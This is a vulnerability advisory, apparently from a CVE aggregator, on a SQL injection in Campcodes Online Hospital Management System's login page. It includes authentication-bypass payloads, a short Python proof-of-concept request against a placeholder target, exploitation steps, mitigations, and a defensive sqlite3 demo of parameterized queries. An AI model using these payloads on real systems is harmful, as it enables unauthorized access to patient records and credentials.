Campcodes Online Hospital Management System, SQL Injection, CVE-2025-6407 (Critical)

How CVE-2025-6407 Works

This critical SQL injection vulnerability exists in Campcodes Online Hospital Management System 1.0 within the `/user-login.php` file. The flaw occurs due to improper sanitization of the `Username` parameter during authentication. Attackers can craft malicious SQL queries by injecting payloads through this input field, allowing unauthorized database access. The vulnerability is remotely exploitable without authentication (AV:N/AC:L) and affects confidentiality, integrity, and availability (VC:L/VI:L/VA:L). Successful exploitation could lead to complete database compromise, including sensitive patient records and system credentials.

DailyCVE Form

Platform: Campcodes OHMS
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 2025-06-21

Prediction: Patch by 2025-07-15

What Undercode Says

Resulting query once the payload is injected into the Username field (the comment marker cuts off the rest of the original WHERE clause):

SELECT * FROM users WHERE username = 'admin' OR '1'='1' --';

Proof-of-concept request (Python, requests library):

import requests
payload = {"Username": "admin'--", "Password": "any"}
requests.post("http://target/user-login.php", data=payload)

How It Is Exploited

1. Craft SQLi payload for Username field

2. Bypass authentication

3. Extract database contents

4. Elevate privileges

Protection from this CVE

1. Parameterized queries

2. Input validation

3. WAF rules
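Added example, not code from the page or from Campcodes: the application is PHP, but the login query is modelled here in Python with an in-memory sqlite3 table so the flaw in "How CVE-2025-6407 Works" and mitigations 1 and 2 above can be exercised side by side. The table name, columns, seeded row and the username allowlist pattern are assumptions.

```python
import re
import sqlite3

# Constructed in-memory stand-in for the application's user table.
# Table name, column names and the seeded row are assumptions, not the real schema.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    # The flaw as described: the Username value is spliced into the SQL text,
    # so a quote plus a comment marker in the input rewrites the WHERE clause.
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None

def login_parameterized(conn, username, password):
    # Mitigation 1: bound parameters keep the input as data. The same payload is
    # now compared literally against the username column and matches nothing.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None

# Mitigation 2: an allowlist for the Username field. The pattern is an assumption;
# match it to the real account naming rules. This is defence in depth only:
# parameterization is what actually closes the injection.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.@-]{1,64}$")

def is_valid_username(username):
    return USERNAME_RE.fullmatch(username) is not None

def demo():
    conn = make_db()
    for payload in ("admin'--", "admin' OR '1'='1' --"):
        print(repr(payload),
              "vulnerable:", login_vulnerable(conn, payload, "any"),
              "parameterized:", login_parameterized(conn, payload, "any"),
              "passes allowlist:", is_valid_username(payload))

if __name__ == "__main__":
    demo()
```

Running it shows both page payloads authenticating through the concatenated query and failing through the parameterized one, while valid credentials still succeed in both.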

Impact

1. Data breach

2. System compromise

3. Patient privacy violation

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
